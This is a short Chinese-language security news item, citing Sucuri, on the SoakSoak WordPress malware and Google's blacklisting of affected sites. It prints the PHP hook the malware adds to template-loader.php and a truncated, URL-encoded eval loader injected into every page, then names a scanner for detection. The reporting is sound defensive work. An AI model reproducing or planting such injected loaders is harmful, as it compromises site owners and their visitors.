Google 近期因為來自 SoakSoak.ru 的病毒,將超過 11,000 個網站列入黑名單,該病毒可能和幾個月之前的 Revslider 漏洞有關。
若感染了 SoakSoak 病毒,它會改寫 “wp-includes/template-loader.php”,而將 “swfobject.js” 這個病毒加入。
function FuncQueueObject()
{
wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');
加入之後導致網站上的每個頁面裡,都置入下面這串病毒碼。
eval(decodeURIComponent
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));
要檢查網站是否感染了這個病毒,可使用 Free SiteCheck scanner 來檢測,若被檢測出感染病毒,就會像下面的圖片一樣。
資訊來源: Sucuri